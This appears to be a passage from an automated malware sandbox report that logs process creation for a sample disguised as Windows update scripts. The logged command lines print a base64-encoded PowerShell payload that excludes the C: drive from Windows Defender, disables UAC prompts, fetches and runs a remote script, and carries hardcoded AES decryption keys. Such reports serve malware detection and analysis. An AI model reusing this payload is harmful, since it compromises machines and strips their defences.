                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\DeviceCredentialDeployment.exe "C:\Windows\system32\DeviceCredentialDeployment.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\windowsupdate.vbS" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES509F.tmp" "c:\Users\user\AppData\Local\Temp\CSC8F7BB283C99B46799FCDCA9D84A75A0.TMP"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXR